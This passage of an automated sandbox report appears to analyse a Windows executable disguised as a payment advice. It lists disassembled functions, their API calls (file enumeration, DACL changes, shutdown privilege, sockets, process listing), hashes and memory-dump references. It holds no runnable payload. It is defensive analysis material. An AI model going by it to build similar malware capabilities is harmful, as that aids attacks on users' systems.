                          • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                          • FindClose.KERNEL32(00000000), ref: 00434D35
                          • FindClose.KERNEL32(00000000), ref: 00434D43
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1409584000-438819550
                          • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                          • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                          • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                          • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                          Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Timetime$Sleep
                          • String ID: BUTTON
                          • API String ID: 4176159691-3405671355
                          • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                          • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                          • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                          • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                          Function 00442E1F Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 134fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,74DE8FB0,74DE8FB0,?,?,00000000), ref: 00442E40
                          • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                          • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                          • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                          • FindClose.KERNEL32(00000000), ref: 00442F80
                            • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                          • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 2640511053-438819550
                          • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                          • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                          • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                          • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                          Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                            • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                            • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                            • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                          • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                          • _memset.LIBCMT ref: 00445E61
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                          • GetLengthSid.ADVAPI32(?), ref: 00445E92
                          • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                          • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                          • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                          • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                          • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 3490752873-0
                          • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                          • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                          • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                          • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                          Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON
                          Download Yara Rule
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 0047AA03
                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                          • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                          • _memset.LIBCMT ref: 0047AB7C
                          • _wcslen.LIBCMT ref: 0047AC68
                          • _memset.LIBCMT ref: 0047ACCD
                          • CoCreateInstanceEx.OLE32 ref: 0047AD06
                          • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                          Strings
                          • NULL Pointer assignment, xrefs: 0047AD84
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                          • String ID: NULL Pointer assignment
                          • API String ID: 1588287285-2785691316
                          • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                          • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                          • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                          • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                          Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                          • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                          • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                          • GetLastError.KERNEL32 ref: 00436504
                          • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                          • String ID: SeShutdownPrivilege
                          • API String ID: 2938487562-3733053543
                          • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                          • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                          • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                          • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                          Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          • __swprintf.LIBCMT ref: 00436162
                          • __swprintf.LIBCMT ref: 00436176
                            • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                          • __wcsicoll.LIBCMT ref: 00436185
                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                          • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                          • LockResource.KERNEL32(00000000), ref: 004361B5
                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                          • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                          • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                          • LockResource.KERNEL32(?), ref: 004361FD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                          • String ID:
                          • API String ID: 2406429042-0
                          • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                          • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                          • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                          • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                          Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                          • GetLastError.KERNEL32 ref: 0045D59D
                          • SetErrorMode.KERNEL32(?), ref: 0045D629
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                          • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                          • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                          • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                          Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON
                          Download Yara Rule
                          APIs
                          • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                            • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                          • OleInitialize.OLE32(00000000), ref: 0047AE06
                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                          • _wcslen.LIBCMT ref: 0047AE18
                          • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                          • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                          • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                          • String ID: HH
                          • API String ID: 1915432386-2761332787
                          • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                          • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                          • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                          • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                          Function 0044ED9A Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 448COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID: DEFINE$`$h$h
                          • API String ID: 0-4194577831
                          • Opcode ID: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                          • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                          • Opcode Fuzzy Hash: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                          • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                          Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                          • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                          • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                          • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                          • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ErrorLast$bindclosesocketsocket
                          • String ID:
                          • API String ID: 2609815416-0
                          • Opcode ID: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                          • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                          • Opcode Fuzzy Hash: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                          • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                          Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                          • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                          • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                          • __wsplitpath.LIBCMT ref: 004370A5
                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                          • _wcscat.LIBCMT ref: 004370BA
                          • __wcsicoll.LIBCMT ref: 004370C8
                          • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                          • String ID:
                          • API String ID: 2547909840-0
                          • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                          • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                          • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                          • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                          Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                          • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                          • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                          • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNextSleep_wcslen
                          • String ID: *.*
                          • API String ID: 2693929171-438819550
                          • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                          • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                          • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                          • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                          Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                          Download Yara Rule
                          APIs
                          • __wcsicoll.LIBCMT ref: 0043643C
                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                          • __wcsicoll.LIBCMT ref: 00436466
                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __wcsicollmouse_event
                          • String ID: DOWN
                          • API String ID: 1033544147-711622031
                          • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                          • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                          • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                          • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                          Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                          • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
